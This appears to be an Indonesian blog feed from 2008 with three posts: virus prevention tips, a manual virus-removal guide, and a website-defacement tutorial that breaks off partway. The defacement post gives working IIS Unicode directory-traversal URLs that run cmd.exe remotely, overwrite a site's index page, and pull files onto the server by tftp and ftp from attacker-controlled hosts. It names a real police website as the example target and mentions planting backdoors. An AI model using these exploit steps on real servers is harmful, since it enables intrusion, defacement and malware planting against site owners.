&lt;br /&gt;&lt;br /&gt;PENANGGULANGANNYA &lt;br /&gt; 1. Langkah-Langkah untuk Pencegahan &lt;br /&gt;Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut : &lt;br /&gt; o Gunakan antivirus yang anda percayai dengan update terbaru. Tidak perduli apapun merknya asalkan selalu diupdate, dan auto-protect dinyalakan maka komputer anda terlindungi. &lt;br /&gt; o Selalu scanning semua media penyimpanan eksternal yang akan digunakan, mungkin hal ini agak merepotkan tetapi jika auto-protect antivirus anda bekerja maka prosedur ini dapat dilewatkan. &lt;br /&gt; o Jika anda terhubung langsung ke Internet cobalah untuk mengkombinasikan antivirus anda dengan Firewall, Anti-spamming, dsb. &lt;br /&gt; o Selalu waspada terhadap fle-file yang mencurigakan, contoh : file dengan 2 buah exstension atau file executable yang terlihat mencurigakan. &lt;br /&gt; o Untuk software freeware + shareware, ada baiknya anda mengambilnya dari situs resminya. &lt;br /&gt; o Semampunya hindari membeli barang bajakan, gunakan software-software open source. &lt;br /&gt; 2. Langkah-Langkah Apabila telah Terinfeksi &lt;br /&gt; o Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah di disket, jaringan, email dsb. Jika anda terhubung ke jaringan maka ada baiknya anda mengisolasi komputer anda dulu (baik dengan melepas kabel atau mendisable sambungan internet dari control panel) &lt;br /&gt; o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda, dengan cara: &lt;br /&gt; 􀂃Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb &lt;br /&gt; 􀂃Scan dengan antivirus anda, jika anda terkena saat auto-protect berjalan berarti virus definition di dalam komputer anda tidak memiliki data virus ini, cobalah update secara manual atau mendownload virus definitionnya untuk kemudian anda install. Jika virus tersebut memblok usaha anda untuk mengupdate, maka upayakan untuk menggunakan media lain (komputer) dengan antivirus yang memiliki update terbaru. &lt;br /&gt; o Bersihkan virus tersebut. Setelah anda berhasil mendeteksi dan mengenalinya maka usahakan segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs-situs yang memberikan informasi perkembangan virus tersebut. Hal ini perlu dilakukan apabila antivirus dengan update terbaru anda tidak berhasil memusnahkannya. &lt;br /&gt; o Langkah terburuk. Jika semua hal diatas tidak berhasil adalah memformat ulang komputer anda . &lt;br /&gt;&lt;br /&gt;PENUTUP &lt;br /&gt;Semoga pembahasan mengenai virus ini dapat memberikan manfaat khususnya bagi kita semua. Tulisan ini ditujukan untuk pembelajaran semata sehingga sangat diharapkan kritik dan sarannya. Apabila banyak kekurangan pada tulisan ini harap dimaklumi. Terakhir, penulis merasa perlu untuk mengucapkan terima kasih kepada *puji, echostaff (MOBY, the_day, z3r0byt3, comex,), newbie_hacker members, dan semua pencinta Opensource.&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-6320916945340417463?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/6320916945340417463/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/mengenal-virus-komputer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/6320916945340417463'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/6320916945340417463'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/mengenal-virus-komputer.html' title='MENGENAL VIRUS KOMPUTER'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-140686495106867937</id><published>2008-12-28T16:50:00.000+07:00</published><updated>2008-12-28T16:52:42.671+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BASMI VIRUS'/><title type='text'>MEMBASMI VIRUS SECARA MANUAL</title><content type='html'>Membasmi Virus, Trojan &amp; Spyware Secara Manual &lt;br /&gt;________________________________________&lt;br /&gt;Threads ini ditujukan untuk membasmi virus-virus baru dan virus Indo yang tidak terdeteksi oleh antivirus yang dipakai pada komputer. Dan juga buat yang bete kalau harus scan komputer cari virus berjam-jam padahal dengan cara ini paling 10 menit beres. Semoga bisa berguna dan bermanfaat.  &lt;br /&gt;&lt;br /&gt;Bagi netter yang komputernya suka terkena virus, mungkin panduan berikut di bawah ini bisa berguna. Secara teori cara ini bisa membunuh 90% yang beredar, hanya virus macro (word, excel) dan virus yang merusak file (extension EXE) yang susah dibersihkan dengan cara ini, walau bisa dicegah penularannya.&lt;br /&gt;&lt;br /&gt;Membasmi Virus Dengan Command Windows&lt;br /&gt;&lt;br /&gt;Bila netter merasakan komputer terkena virus, trojan dan spyware (dalam hal ini kita kategorikan semuanya sebagai virus aja), yang biasanya dengan indikasi ada tampilan yang tidak biasanya pada desktop, program yang digunakan dan browser. Sebaiknya langsung menempuh langkah berikut ini:&lt;br /&gt;&lt;br /&gt;1. Tahap Pertama, Matikan Virus di Memori&lt;br /&gt;&lt;br /&gt;Tekan Ctrl + Alt + Del untuk menampilan Windows Task Manager - Lalu ke bagian "Processes", terus klik bagian "User Name" untuk mengurutkan file yang diproses pada memori. Setelah itu, lihat ada bagian yang mencurigakan atau tidak. Bila banyak yang di-loading pada memori, sebaiknya dimatikan dahulu startup yang otomatis ter-loading pada bagian bawah kanan (ikon speaker dan jam). Matikan semua ikon-ikon tersebut dengan cara "quit" atau "exit" dari programnya.&lt;br /&gt;&lt;br /&gt;Loading virus ke memori biasanya berupa EXE file. Langkah ini untuk mencegah virus untuk menyebar terlebih dahulu lewat memori kita. Matikan semua file EXE yang loading di memori kita yang sudah kita urutkan sebelumnya berdasarkan "User Name". Jangan mematikan file yang kategori "System", "Local Service", dan "Network Service", karena bisa membuat sistem kita Hang atau Freeze.&lt;br /&gt;&lt;br /&gt;2. Tahap Kedua, Non-aktifkan Virus di Startup&lt;br /&gt;Untuk menon-aktifkan virus supaya tidak terloading ke memori, kita harus membuangnya di startup. Caranya kita bisa menggunakan perintah MSCONFIG, klik menu Start&gt;Run&gt;msconfig - setelah itu akan tampil "System Configuration Utility". Lalu pilihlah "Startup", dalam kasus ini sebaiknya netter yang tidak mengerti mana yang loading virus mana yang bukan, sebaiknya pilih "Disable All". Nantinya netter baru aktifkan kembali startup yang diinginkan kalau virus sudah bersih.&lt;br /&gt;&lt;br /&gt;Bila netter yang mengerti file yang loading mana file yang diperlukan, dan mana yang tidak, atau mana yang virus atau bukan, sebaiknya menbuang conteng (check box) pada kotak bagian kiri untuk yang dicurigai sebagai virus. Cara ini akan menonaktifkan virus di startup kita.&lt;br /&gt;&lt;br /&gt;3. Tahap Ketiga, Hapus File Virus dari Komputer&lt;br /&gt;Carilah dengan menggunakan fasilitas "search" pada WIndows, klik menu Start&gt;Search, lalu carilah file EXE virus (contoh: Happy.exe) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan oleh pembuatnya di bagian folder Windows atau System32 dari WIndows. Setelah ditemukan, delete atau hapus file tersebut.&lt;br /&gt;&lt;br /&gt;4. Tahap Keempat, Hapus Virus dari System Registry&lt;br /&gt;Tahap ini adalah tahap terakhir. Kita harus menggunakan perintah REGEDIT untuk mengubah dan men-delete virus dari registry kita. Pilihlah Start&gt;Run&gt;regedit - lalu ke menu "Edit" pilihlah "Find" (atau tekan Ctrl+F). Masukkan nama file virus yang ingin kita hapus (contoh: Happy.exe), lalu pilih "Find Next". Apabila ditemukan file virus, hapuslah semua registry yang memuat virus tersebut (berikut dengan foldernya kalau ada).&lt;br /&gt;&lt;br /&gt;Kemudian lanjutkan dengan menekan tombol "F3" atau di menu pilih "Edit" terus "Find Next". Biasanya file virus diletakkan pada beberapa tempat di registry. Jadi pastikan netter menghapus semuanya sampai bersih, dalam arti registry komputer bebas dari loading virus tersebut. Karena kalau tidak pekerjaan ini akan sia-sia.&lt;br /&gt;Membasmi Virus Dengan Bantuan Program Lain&lt;br /&gt;&lt;br /&gt;Ada beberapa tools yang sangat berguna bagi netter untuk mempermudah pembasmian virus, antara lain:&lt;br /&gt;&lt;br /&gt;CProcess - Tools ini fungsinya seperti "Windows Task Manager" (Ctrl + Alt +Del). Tools ini sangat bagus sekali untuk mengenali mana yang virus atau bukan karena mengandung informasi detil mengenai file yang terloading di memori. Seperti contoh file yang benar (bukan virus) selalu tertulis nama perusahaan pembuatnya (contoh: Windows buatan Microsoft Corp).&lt;br /&gt;&lt;br /&gt;Hijack This - Tools yang sangat bagus sekali sebagai pengganti command MSCONFIG. Sering kali virus mematikan hak akses kita terhadap MSCONFIG supaya kita tidak bisa menghapus file virus yang ter-loading ketika Startup. Nah program ini berfungsi untuk menggantikan MSCONFIG yang tidak bisa aktif. Selain itu program ini bisa mendeteksi lebih mendetil seperti spyware yang inject di dalam browser kita (BHO), dan bisa menonaktifkannya..&lt;br /&gt;CCleaner - Tools yang satu ini selain berguna untuk menggantikan command REGEDIT, juga bisa membersihkan virus di registry secara otomatis. Selain itu CCleaner juga bisa mempercepat akses Windows kamu dengan membersihkan semua sampah-sampah di dalam registry kamu.&lt;br /&gt;PCMAV - Program antivirus buatan PC Media ini terbukti sangat ampuh untuk menghapus virus-virus Indo yang kadang-kadang suka rese.&lt;br /&gt;AVG 8 Free Edition - Program antivirus gratis yang sangat powerful untuk mengatasi virus dari luar negeri.&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-140686495106867937?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/140686495106867937/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/membasmi-virus-secara-manual.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/140686495106867937'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/140686495106867937'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/membasmi-virus-secara-manual.html' title='MEMBASMI VIRUS SECARA MANUAL'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-215547362920563726</id><published>2008-12-28T15:52:00.000+07:00</published><updated>2008-12-28T16:06:23.167+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CARA HACKER'/><title type='text'>DEFACE WEBSITE</title><content type='html'>TUTORIAL HACKER&lt;br /&gt;Tutorial Unicode By Jati/Gab  ( Crew SMPN19 Bogor)Os Target Windows Nt /9xIni HendakNya Dijadikan Bahan Percobaan yang Bermanfaat YachTutorial ini diperoleh dari orang orang yang aktif di irc.dal.net  chanel: #MinangCrew, #K-elektronik,#Hackermuda, #Deface-team,&lt;br /&gt;#Makassarhack, #Indohack   #IndoCarding, #Cracxer,#Cacing,#CrackerLink, #MedanHacking,&lt;br /&gt;#Aritechdev,#Neoteker ...etcINGAT JIKA KAMU MERASA MENJADI HACKER SEJATI JANGAN MERUSAK WEB ORANG&lt;br /&gt;TAPI HANYA MEMPERINGATKAN SAJA SUPAYA SEKURITYNYA LEBIH BAIK LAGI.JANGAN LUPA SELALU MEMBECKUP WEB YANG KAMU HACK JADI KAMU BISA&lt;br /&gt;MEMBANTU MEMBENARKANYA LAGI.KAMU BOLEH MERUSAK WEB JIKA WEB TERSEBUT BERBAU SARA, RAS, DAN PORNO&lt;br /&gt;SERTA YANG SIFATNYA MENDORONG ORANG UNTUK ANARKIS/MENGHASUT&lt;br /&gt;KEKERASANBE WHITE HACKER DON’T BE BLACK HACKER/CRACKERPEACE AND FREE1. Kita Harus menentukan WebSite Target/ Sasaran Kita : &lt;a href="http://www.target.loe/"&gt;www.target.loe&lt;/a&gt; contoh--&gt;&gt;&lt;br /&gt;&lt;a href="http://www.polri.go.id/"&gt;www.polri.go.id&lt;/a&gt;&lt;br /&gt;2. Login Ini Merupakan Directory yang  Ada Di Web Site Tersebut   Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut&lt;br /&gt;Berhubungan Jika  terjadi bug pada script nya maka kita bisa bembus web ini   ada beberapa contoh login diantaranya :    a)/_vti_bin    b)/_vti_cnf    c)/cgi-bin    d)/scripts    e)/msadc&lt;br /&gt;3. Unicode ---&gt;&gt; merupakan code yang dapat membaca script configurasi website tersebut code&lt;br /&gt;ini yang dapat membaca bug cgi nya   hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng    a) ..%c1%1c..    b) ..%c0%9v..    c) ..%c0%af..    d) ..%c0%qf..    e) ..%c1%8s..    f) ..%e0%80%af..    g) ..%c1%9c..    h) ..%c1%pc..&lt;br /&gt;4. OS target --&gt;&gt;ini Menyatakan Sertificate Web Os kita  WinNT dan Win98    0xB5   ISO 8859-1    0xC5   ISO 8859-1    0xEA   CP437    0x2140   JIS X 0208    0x22   ISO 8859-1&lt;br /&gt;5. Cara KerjaSecara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :A.) Deface WebSite Perintah Echo&lt;br /&gt; a.)Secara umum  : &lt;a href="http://target/login/unicode/os/system/c+dir"&gt;http://target/login/unicode/os/system/c+dir&lt;/a&gt; atau&lt;br /&gt;&lt;a href="http://www.polri.go.id/login/unicode/os/system/c+dir"&gt;http://www.polri.go.id/login/unicode/os/system/c+dir&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c&lt;/a&gt;:&lt;br /&gt;contohnya --&gt;&gt;&lt;br /&gt; Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah&lt;br /&gt;menembus web site itu Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver&lt;br /&gt;tersebut sama halnya command dir yang kita lakukan di Dos Prompt Directory of c:  10/05/2001  19:56       &lt;dir&gt;   Programs Files  10/05/2001  19:56       &lt;dir&gt;   Inetpub  08/05/2001  10:23     230 cmd.exe  24/04/2001  04:33                4.620 1home.htm  05/10/2000  12:40                  668 about.htm  10/05/2001  19:54       &lt;dir&gt;          AboutUs  11/05/2001  10:28                  131 about_us.htm  28/10/2000  14:49                4.911 about_us.old.htm&lt;br /&gt; b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan&lt;br /&gt;menggunakan command  /c+dir+c: di ubah menjadi /c+set&lt;br /&gt;&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c&lt;/a&gt;:&lt;br /&gt;menjadi &lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set&lt;/a&gt;  /c+dir+c: di ubah menjadi /c+set&lt;br /&gt; maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem&lt;br /&gt;WebServer tersebut Keluar Macam - Macam Yang Perlu dilihat cuma Path_Translade=d:wwwpolri&lt;br /&gt; c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe  atau&lt;br /&gt;nama anda contoh Jati.exe dengan mengganti&lt;br /&gt;  /c+dir+c:  menjadi  /c+copy+c:&lt;br /&gt; lalu ditambahkan dengan : winntsystem32cmd.exe+c:jati.exe&lt;br /&gt; sehingga kita dapatkan  :&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:win"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:win&lt;/a&gt;&lt;br /&gt;ntsystem32cmd.exe+c:jati.exe&lt;br /&gt; sekarang kamu bisa liat file cmd1.exe udah ada di direktori :&lt;br /&gt; &lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c&lt;/a&gt;: Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita&lt;br /&gt; d.)Cari halaman index ke &lt;a href="http://www.target.com/blah.ida"&gt;www.target.com/blah.ida&lt;/a&gt; Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path. Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :&lt;br /&gt; &lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpub"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpub&lt;/a&gt;&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwroot"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwroot&lt;/a&gt;&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwrootindex.ht"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwrootindex.ht&lt;/a&gt;&lt;br /&gt;m&lt;br /&gt; sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau&lt;br /&gt;dengan kata lain folder webnya&lt;br /&gt; e.)kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker&lt;br /&gt;kerjanya bukan menghancurkan tapi memperingatkan hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja&lt;br /&gt;merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan&lt;br /&gt;cara :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+copy+c:inetpubwwwrootindex"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+copy+c:inetpubwwwrootindex&lt;/a&gt;.&lt;br /&gt;htm+c:inetpubwwwrootindex.htm.bak&lt;br /&gt; f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack&lt;/a&gt;&lt;br /&gt;ed+&gt;+c:inetpubwwwrootindex.htm untuk tidak merusak web nya kita tulis dengan nama file baru &lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack&lt;/a&gt;&lt;br /&gt;ed+&gt;+c:inetpubwwwrootjati.htm&lt;br /&gt;        /c+echo+You%20Were%20Hacked+&gt;+c:  &gt;&gt;&gt;  adalah untuk menuliskan kata-kata You&lt;br /&gt;Were Hacked pada&lt;br /&gt;        c:inetpubwwwrootindex.htm file yang ditulis  atau c:inetpubwwwrootjati.htm file yang&lt;br /&gt;ditulis &lt;br /&gt; Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren&lt;br /&gt;Gunakan command ini /c+echo"&lt;html&gt;&lt;head&gt;&lt;title&gt;..::Web Site Has Been Hacking BY Jati:..&lt;/title&gt;&lt;body&lt;br /&gt;Bgcolor%3dBlack Text%3dRed&gt;&lt;script language='JavaScript' type='text/javascript'&lt;br /&gt;src='http://www.web1000.com/theader.js'&gt;&lt;/script&gt;&lt;center&gt;This Web Site Hacking BY &lt;marquee bgcolor%3dWhite&lt;br /&gt;Text%3dred&gt;&lt;b&gt;....:::J.A.T.I:...&lt;/b&gt;&lt;/marquee&gt;&lt;br /&gt;Thanks To Pepole On Irc.Dal.net&lt;br /&gt;%23MinangCrew And %23Hackermuda&lt;br /&gt;&lt;img&lt;br /&gt;src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22&gt;&lt;script language='javascript'&lt;br /&gt;type='text/javascript' src='http://www.web1000.com/tfooter.js'&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;"+&gt;+c:inepubwwwrootindex.htm /c+echo"&lt;html&gt;&lt;head&gt;&lt;title&gt;..::Web Site Has Been Hacking BY Jati:..&lt;/title&gt;&lt;body&lt;br /&gt;Bgcolor%3dBlack Text%3dRed&gt;&lt;script language='JavaScript' type='text/javascript'&lt;br /&gt;src='http://www.web1000.com/theader.js'&gt;&lt;/script&gt;&lt;center&gt;This Web Site Hacking BY &lt;marquee bgcolor%3dWhite&lt;br /&gt;Text%3dred&gt;&lt;b&gt;....:::J.A.T.I:...&lt;/b&gt;&lt;/marquee&gt;&lt;br /&gt;Thanks To Pepole On Irc.Dal.net&lt;br /&gt;%23MinangCrew And %23Hackermuda&lt;br /&gt;&lt;img&lt;br /&gt;src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22&gt;&lt;script language='javascript'&lt;br /&gt;type='text/javascript' src='http://www.web1000.com/tfooter.js'&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;"+&gt;+c:inepubwwwrootjati.htm keterangan :  %3d adalah pernyataan tanda =  %22 adalah Pernyataan tanda "  %23 adalah pernyataan tanda # Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar&lt;br /&gt;Bagus hack deface nya di input pakai Flash juga&lt;br /&gt; g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan&lt;br /&gt;perintah 'type' :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootindex"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootindex&lt;/a&gt;.&lt;br /&gt;htm&lt;br /&gt;&lt;a href="http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootjati.ht"&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootjati.ht&lt;/a&gt;&lt;br /&gt;m Atau liat Langsung aja &lt;a href="http://www.polri.go.id/"&gt;http://www.polri.go.id/&lt;/a&gt; atau &lt;a href="http://www.polri.go.id/jati.htm"&gt;www.polri.go.id/jati.htm&lt;/a&gt;&lt;br /&gt;Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan )&lt;br /&gt;Maka langkah kedua yaitu dengan cara tftp:&lt;br /&gt;B.) Deface WebSite Dengan Cara tftp&lt;br /&gt; Deface nya dilakukan dengan meng-upload file lewat TFTP32 Untuk Mendukung Tftp kita download dulu softwarenya &lt;a href="http://www.download.com/"&gt;http://www.download.com&lt;/a&gt; ketik&lt;br /&gt;keyword nya TFTP32 Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung&lt;br /&gt;sajah.        mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :&lt;br /&gt; a.)Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya&lt;br /&gt;atau bugcginya sehinggha kita mendapatkan holenya atau script nya&lt;br /&gt;&lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt; /winnt/system32/cmd.exe?/ langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File&lt;br /&gt;htm/html halaman web defacenya ( berkreasi lah dikau disini ) Setelah semua siap baru upload dengan command&lt;br /&gt;&lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe&lt;br /&gt;up-load)+ C:InetPubwwwrootmain.html&lt;br /&gt; b.)Kita liat lagi apa yg terjadi di IE kita.&lt;br /&gt; CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP&lt;br /&gt;headers. The headers it did return are :&lt;br /&gt; Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer&lt;br /&gt;TFTP32 tadee silahkan buka web site target tadi&lt;br /&gt; Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web&lt;br /&gt;site) tidak mau menerima up-load file kita tadee .Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.&lt;br /&gt;C.) Dengan Cara Ftp Dengan WebKita Yang Telah Kita Isi Dengan Bahan Deface Kita&lt;br /&gt;        Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu&lt;br /&gt;kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya&lt;br /&gt;        selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi&lt;br /&gt;bugnya atau unicodennya maka dikau lakukan langkah berikut ini:&lt;br /&gt; a.)Setelaha kita menemukan vulnernya           &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt; /winnt/system32/cmd.exe?/c+dir+c:           Directory of c:  10/05/2001  19:56       &lt;dir&gt;   Programs Files  10/05/2001  19:56       &lt;dir&gt;   Inetpub  08/05/2001  10:23     230 cmd.exe  24/04/2001  04:33                4.620 1home.htm  05/10/2000  12:40                  668 about.htm  10/05/2001  19:54       &lt;dir&gt;          AboutUs  11/05/2001  10:28                  131 about_us.htm  28/10/2000  14:49                4.911 about_us.old.htm     &lt;br /&gt;        b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ----&gt;&gt;tujuan nya memedekan&lt;br /&gt;command unicode nya         &lt;br /&gt;        c.) Lalu Kita Liat +set nya  untuk melihat patch translade nya           &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt; /winnt/system32/cmd.exe?/c+set&lt;br /&gt;          Kira Nya path nya di c:inetpubwwwroot&lt;br /&gt;        d.)Langkah Selanjutnya Yaitu kita membuat script ftp            - &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+echo+open+geocities.com+&gt;&gt;+c:inetpubwwwrootjati.ftp            - &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+echo+jati+&gt;&gt;+c:inetpubwwwrootjati.ftp            - &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+echo+anuamakang+&gt;&gt;+c:inetpubwwwrootjati.ftp            - &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+&gt;&gt;+c:inetpubwwwrootjati.ftp            - &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+echo+ascii+&gt;&gt;+c:inetpubwwwrootjati.ftp            - &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+echo+get+jati.htm+&gt;&gt;+c:inetpubwwwrootjati.ftp            - &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+echo+close+&gt;&gt;+c:inetpubwwwrootjati.ftp&lt;br /&gt;              Setelah Scrip jati.ftp selesai di liat lagi script nya apa benar             &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br 